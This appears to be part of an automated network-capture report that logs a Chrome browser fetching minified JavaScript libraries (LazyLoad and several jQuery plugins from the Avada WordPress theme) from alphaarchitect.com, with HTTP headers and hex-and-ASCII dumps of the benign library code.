                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC877INData Raw: 32 32 62 63 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 6e 7c 7c 73 65 6c 66 29 2e 4c 61 7a 79 4c 6f 61 64 3d 74 28 29 7d 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 72 65 74
                                                                                                                                                                                                                                                                        Data Ascii: 22bc!function(n,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(n="undefined"!=typeof globalThis?globalThis:n||self).LazyLoad=t()}(this,(function(){"use strict";function n(){ret
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 68 69 64 70 69 3a 22 62 67 2d 68 69 64 70 69 22 2c 64 61 74 61 5f 62 67 5f 6d 75 6c 74 69 3a 22 62 67 2d 6d 75 6c 74 69 22 2c 64 61 74 61 5f 62 67 5f 6d 75 6c 74 69 5f 68 69 64 70 69 3a 22 62 67 2d 6d 75 6c 74 69 2d 68 69 64 70 69 22 2c 64 61 74 61 5f 62 67 5f 73 65 74 3a 22 62 67 2d 73 65 74 22 2c 64 61 74 61 5f 70 6f 73 74 65 72 3a 22 70 6f 73 74 65 72 22 2c 63 6c 61 73 73 5f 61 70 70 6c 69 65 64 3a 22 61 70 70 6c 69 65 64 22 2c 63 6c 61 73 73 5f 6c 6f 61 64 69 6e 67 3a 22 6c 6f 61 64 69 6e 67 22 2c 63 6c 61 73 73 5f 6c 6f 61 64 65 64 3a 22 6c 6f 61 64 65 64 22 2c 63 6c 61 73 73 5f 65 72 72 6f 72 3a 22 65 72 72 6f 72 22 2c 63 6c 61 73 73 5f 65 6e 74 65 72 65 64 3a 22 65 6e 74 65 72 65 64 22 2c 63 6c 61 73 73 5f 65 78 69 74 65 64 3a 22 65 78 69 74 65 64
                                                                                                                                                                                                                                                                        Data Ascii: hidpi:"bg-hidpi",data_bg_multi:"bg-multi",data_bg_multi_hidpi:"bg-multi-hidpi",data_bg_set:"bg-set",data_poster:"poster",class_applied:"applied",class_loading:"loading",class_loaded:"loaded",class_error:"error",class_entered:"entered",class_exited:"exited
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 6f 3f 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 74 29 3a 6e 2e 63 6c 61 73 73 4e 61 6d 65 3d 6e 2e 63 6c 61 73 73 4e 61 6d 65 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 28 5e 7c 5c 5c 73 2b 29 22 2b 74 2b 22 28 5c 5c 73 2b 7c 24 29 22 29 2c 22 20 22 29 2e 72 65 70 6c 61 63 65 28 2f 5e 5c 73 2b 2f 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 73 2b 24 2f 2c 22 22 29 7d 2c 7a 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 6c 6c 54 65 6d 70 49 6d 61 67 65 7d 2c 54 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 69 66 28 74 29 7b 76 61 72 20 65 3d 74 2e 5f 6f 62 73 65 72 76 65 72 3b 65 26 26 65 2e 75 6e 6f 62 73 65 72 76 65 28 6e 29 7d 7d 2c 52 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                        Data Ascii: nction(n,t){o?n.classList.remove(t):n.className=n.className.replace(new RegExp("(^|\\s+)"+t+"(\\s+|$)")," ").replace(/^\s+/,"").replace(/\s+$/,"")},z=function(n){return n.llTempImage},T=function(n,t){if(t){var e=t._observer;e&&e.unobserve(n)}},R=function(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 28 6e 2c 75 2c 79 28 6e 2c 74 2e 64 61 74 61 5f 73 72 63 29 29 7d 29 29 2c 24 28 6e 2c 46 29 2c 57 28 6e 2c 66 2c 79 28 6e 2c 74 2e 64 61 74 61 5f 70 6f 73 74 65 72 29 29 2c 57 28 6e 2c 75 2c 79 28 6e 2c 74 2e 64 61 74 61 5f 73 72 63 29 29 2c 6e 2e 6c 6f 61 64 28 29 7d 2c 4f 42 4a 45 43 54 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 24 28 6e 2c 4a 29 2c 57 28 6e 2c 67 2c 79 28 6e 2c 74 2e 64 61 74 61 5f 73 72 63 29 29 7d 7d 2c 5a 3d 5b 22 49 4d 47 22 2c 22 49 46 52 41 4d 45 22 2c 22 56 49 44 45 4f 22 2c 22 4f 42 4a 45 43 54 22 5d 2c 6e 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 21 74 7c 7c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 6c 6f 61 64 69 6e 67 43 6f 75 6e 74 3e 30 7d 28 74 29 7c 7c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72
                                                                                                                                                                                                                                                                        Data Ascii: (n,u,y(n,t.data_src))})),$(n,F),W(n,f,y(n,t.data_poster)),W(n,u,y(n,t.data_src)),n.load()},OBJECT:function(n,t){$(n,J),W(n,g,y(n,t.data_src))}},Z=["IMG","IFRAME","VIDEO","OBJECT"],nn=function(n,t){!t||function(n){return n.loadingCount>0}(t)||function(n){r
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 72 6f 75 6e 64 49 6d 61 67 65 7d 29 7d 28 6e 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 29 7b 76 61 72 20 69 3d 79 28 6e 2c 74 2e 64 61 74 61 5f 62 67 29 2c 6f 3d 79 28 6e 2c 74 2e 64 61 74 61 5f 62 67 5f 68 69 64 70 69 29 2c 72 3d 61 26 26 6f 3f 6f 3a 69 3b 72 26 26 28 6e 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 3d 27 75 72 6c 28 22 27 2e 63 6f 6e 63 61 74 28 72 2c 27 22 29 27 29 2c 7a 28 6e 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 75 2c 72 29 2c 51 28 6e 2c 74 2c 65 29 29 7d 28 6e 2c 74 2c 65 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 29 7b 76 61 72 20 69 3d 79 28 6e 2c 74 2e 64 61 74 61 5f 62 67 5f 6d 75 6c 74 69 29 2c 6f 3d 79 28 6e 2c 74 2e 64 61 74 61 5f 62 67 5f 6d 75 6c 74 69 5f 68 69 64 70 69 29 2c 72 3d 61
                                                                                                                                                                                                                                                                        Data Ascii: roundImage})}(n),function(n,t,e){var i=y(n,t.data_bg),o=y(n,t.data_bg_hidpi),r=a&&o?o:i;r&&(n.style.backgroundImage='url("'.concat(r,'")'),z(n).setAttribute(u,r),Q(n,t,e))}(n,t,e),function(n,t,e){var i=y(n,t.data_bg_multi),o=y(n,t.data_bg_multi_hidpi),r=a
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 61 67 65 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 7d 2c 76 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 29 7b 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 69 73 49 6e 74 65 72 73 65 63 74 69 6e 67 7c 7c 6e 2e 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 61 74 69 6f 3e 30 7d 28 6e 29 3f 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 2c 69 29 7b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 78 2e 69 6e 64 65 78 4f 66 28 6b 28 6e 29 29 3e 3d 30 7d 28 6e 29 3b 77 28 6e 2c 22 65 6e 74 65 72 65 64 22 29 2c 4e 28 6e 2c 65 2e 63 6c 61 73 73 5f 65 6e 74 65 72 65 64 29 2c 4d 28 6e 2c 65 2e 63 6c 61 73 73 5f 65 78 69 74 65 64 29
                                                                                                                                                                                                                                                                        Data Ascii: ageElement.prototype},vn=function(n,t,e){n.forEach((function(n){return function(n){return n.isIntersecting||n.intersectionRatio>0}(n)?function(n,t,e,i){var o=function(n){return x.indexOf(k(n))>=0}(n);w(n,"entered"),N(n,e.class_entered),M(n,e.class_exited)
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1178INData Raw: 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 6e 6c 69 6e 65 22 2c 65 2e 5f 6f 6e 6c 69 6e 65 48 61 6e 64 6c 65 72 29 29 7d 28 6f 2c 74 68 69 73 29 2c 74 68 69 73 2e 75 70 64 61 74 65 28 65 29 7d 3b 72 65 74 75 72 6e 20 45 6e 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 75 70 64 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 2c 6f 2c 61 3d 74 68 69 73 2e 5f 73 65 74 74 69 6e 67 73 2c 72 3d 68 6e 28 6e 2c 61 29 3b 47 28 74 68 69 73 2c 72 2e 6c 65 6e 67 74 68 29 2c 21 65 26 26 69 3f 67 6e 28 61 29 3f 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 29 7b 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 2d 31 21 3d 3d 5f 6e 2e 69 6e 64 65 78 4f 66 28 6e 2e 74 61 67 4e 61 6d 65 29 26 26 66 75 6e 63 74 69 6f 6e 28 6e 2c 74
                                                                                                                                                                                                                                                                        Data Ascii: w.addEventListener("online",e._onlineHandler))}(o,this),this.update(e)};return En.prototype={update:function(n){var t,o,a=this._settings,r=hn(n,a);G(this,r.length),!e&&i?gn(a)?function(n,t,e){n.forEach((function(n){-1!==_n.indexOf(n.tagName)&&function(n,t
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        25192.168.2.449772141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC620OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.fade.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:46 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-489"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147804
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9c88bdf0f7c-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC878INData Raw: 34 38 39 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 66 6e 2e 66 75 73 69 6f 6e 53 63 72 6f 6c 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 66 3d 74 2e 65 78 74 65 6e 64 28 7b 74 79 70 65 3a 22 6f 70 61 63 69 74 79 22 2c 6f 66 66 73 65 74 3a 30 2c 65 6e 64 4f 66 66 73 65 74 3a 22 22 7d 2c 65 29 3b 74 28 74 68 69 73 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 69 2c 72 2c 6f 3d 74 68 69 73 3b 74 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 73 63 72 6f 6c 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 2c 6c 2c 70 2c 63 3b 65 3d 74 28 6f 29 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 2c 74 28 22 62 6f 64 79 22 29 2e 68 61 73 43 6c 61 73 73 28 22 61 64 6d 69 6e 2d 62 61 72
                                                                                                                                                                                                                                                                        Data Ascii: 489!function(t){"use strict";t.fn.fusionScroller=function(e){var f=t.extend({type:"opacity",offset:0,endOffset:""},e);t(this).each(function(){var e,i,r,o=this;t(window).on("scroll",function(){var s,l,p,c;e=t(o).offset().top,t("body").hasClass("admin-bar
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC290INData Raw: 74 28 6f 29 2e 63 73 73 28 7b 6f 70 61 63 69 74 79 3a 31 7d 29 3a 22 62 6c 75 72 22 3d 3d 3d 66 2e 74 79 70 65 3f 28 63 3d 22 62 6c 75 72 28 30 70 78 29 22 2c 74 28 6f 29 2e 63 73 73 28 7b 22 2d 77 65 62 6b 69 74 2d 66 69 6c 74 65 72 22 3a 63 2c 22 2d 6d 73 2d 66 69 6c 74 65 72 22 3a 63 2c 22 2d 6f 2d 66 69 6c 74 65 72 22 3a 63 2c 22 2d 6d 6f 7a 2d 66 69 6c 74 65 72 22 3a 63 2c 66 69 6c 74 65 72 3a 63 7d 29 29 3a 22 66 61 64 69 6e 67 5f 62 6c 75 72 22 3d 3d 3d 66 2e 74 79 70 65 26 26 28 63 3d 22 62 6c 75 72 28 30 70 78 29 22 2c 74 28 6f 29 2e 63 73 73 28 7b 6f 70 61 63 69 74 79 3a 31 2c 22 2d 77 65 62 6b 69 74 2d 66 69 6c 74 65 72 22 3a 63 2c 22 2d 6d 73 2d 66 69 6c 74 65 72 22 3a 63 2c 22 2d 6f 2d 66 69 6c 74 65 72 22 3a 63 2c 22 2d 6d 6f 7a 2d 66 69 6c
                                                                                                                                                                                                                                                                        Data Ascii: t(o).css({opacity:1}):"blur"===f.type?(c="blur(0px)",t(o).css({"-webkit-filter":c,"-ms-filter":c,"-o-filter":c,"-moz-filter":c,filter:c})):"fading_blur"===f.type&&(c="blur(0px)",t(o).css({opacity:1,"-webkit-filter":c,"-ms-filter":c,"-o-filter":c,"-moz-fil
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        26192.168.2.449773141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC626OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.mousewheel.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:46 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-a40"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147804
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9c88e67f3bb-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC878INData Raw: 61 34 30 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 3a 65 28 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 69 2c 6e 3d 5b 22 77 68 65 65 6c 22 2c 22 6d 6f 75 73 65 77 68 65 65 6c 22 2c 22 44 4f 4d 4d 6f 75 73 65 53 63 72 6f 6c 6c 22 2c 22 4d 6f 7a 4d 6f 75 73 65 50 69 78 65 6c 53 63 72 6f 6c 6c 22 5d 2c 6f 3d 22 6f 6e 77 68 65 65 6c 22 69 6e 20 64 6f 63 75 6d 65 6e 74 7c 7c 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: a40!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?module.exports=e:e(jQuery)}(function(e){var t,i,n=["wheel","mousewheel","DOMMouseScroll","MozMousePixelScroll"],o="onwheel"in document||document.document
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC1369INData Raw: 65 77 68 65 65 6c 3d 6e 75 6c 6c 3b 65 2e 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2c 22 6d 6f 75 73 65 77 68 65 65 6c 2d 6c 69 6e 65 2d 68 65 69 67 68 74 22 29 2c 65 2e 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2c 22 6d 6f 75 73 65 77 68 65 65 6c 2d 70 61 67 65 2d 68 65 69 67 68 74 22 29 7d 2c 67 65 74 4c 69 6e 65 48 65 69 67 68 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 69 3d 65 28 74 29 2c 6e 3d 69 5b 22 6f 66 66 73 65 74 50 61 72 65 6e 74 22 69 6e 20 65 2e 66 6e 3f 22 6f 66 66 73 65 74 50 61 72 65 6e 74 22 3a 22 70 61 72 65 6e 74 22 5d 28 29 3b 72 65 74 75 72 6e 20 6e 2e 6c 65 6e 67 74 68 7c 7c 28 6e 3d 65 28 22 62 6f 64 79 22 29 29 2c 70 61 72 73 65 49 6e 74 28 6e 2e 63 73 73 28 22 66 6f 6e 74 53 69 7a 65 22 29 2c 31 30 29 7c 7c 70
                                                                                                                                                                                                                                                                        Data Ascii: ewheel=null;e.removeData(this,"mousewheel-line-height"),e.removeData(this,"mousewheel-page-height")},getLineHeight:function(t){var i=e(t),n=i["offsetParent"in e.fn?"offsetParent":"parent"]();return n.length||(n=e("body")),parseInt(n.css("fontSize"),10)||p
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC384INData Raw: 61 4d 6f 64 65 3d 30 2c 68 2e 75 6e 73 68 69 66 74 28 6e 2c 66 2c 64 2c 63 29 2c 74 26 26 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 29 2c 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 72 2c 32 30 30 29 2c 28 65 2e 65 76 65 6e 74 2e 64 69 73 70 61 74 63 68 7c 7c 65 2e 65 76 65 6e 74 2e 68 61 6e 64 6c 65 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 68 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 69 3d 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 61 2e 73 65 74 74 69 6e 67 73 2e 61 64 6a 75 73 74 4f 6c 64 44 65 6c 74 61 73 26 26 22 6d 6f 75 73 65 77 68 65 65 6c 22 3d 3d 3d 65 2e 74 79 70 65 26 26 74 25 31 32 30 3d 3d 30 7d 65 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 6d 6f 75 73 65 77 68 65 65 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b
                                                                                                                                                                                                                                                                        Data Ascii: aMode=0,h.unshift(n,f,d,c),t&&clearTimeout(t),t=setTimeout(r,200),(e.event.dispatch||e.event.handle).apply(this,h)}}function r(){i=null}function u(e,t){return a.settings.adjustOldDeltas&&"mousewheel"===e.type&&t%120==0}e.fn.extend({mousewheel:function(e){
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        27192.168.2.449771141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC626OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/jquery.sticky-kit.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:46 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-17d4"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147804
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9c88e4643bc-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:46 UTC877INData Raw: 31 37 64 34 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 69 3b 74 3d 74 68 69 73 2e 6a 51 75 65 72 79 7c 7c 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 69 3d 74 28 77 69 6e 64 6f 77 29 2c 74 2e 66 6e 2e 73 74 69 63 6b 5f 69 6e 5f 70 61 72 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 73 29 7b 76 61 72 20 6f 2c 6e 2c 65 2c 72 2c 63 2c 61 2c 66 2c 6c 2c 75 2c 67 2c 64 2c 6b 2c 68 2c 70 2c 79 2c 76 2c 6d 2c 62 2c 5f 2c 43 3b 66 6f 72 28 6e 75 6c 6c 3d 3d 73 26 26 28 73 3d 7b 7d 29 2c 6b 3d 73 2e 73 74 69 63 6b 79 5f 63 6c 61 73 73 2c 61 3d 73 2e 69 6e 6e 65 72 5f 73 63 72 6f 6c 6c 69 6e 67 2c 64 3d 73 2e 72 65 63 61 6c 63 5f 65 76 65 72 79 2c 67 3d 73 2e 70 61 72 65 6e 74 2c 75 3d 73 2e 6f 66 66 73 65 74 5f 74 6f 70 2c 6c 3d 73 2e 73 70 61 63 65 72 2c
                                                                                                                                                                                                                                                                        Data Ascii: 17d4(function(){var t,i;t=this.jQuery||window.jQuery,i=t(window),t.fn.stick_in_parent=function(s){var o,n,e,r,c,a,f,l,u,g,d,k,h,p,y,v,m,b,_,C;for(null==s&&(s={}),k=s.sticky_class,a=s.inner_scrolling,d=s.recalc_every,g=s.parent,u=s.offset_top,l=s.spacer,
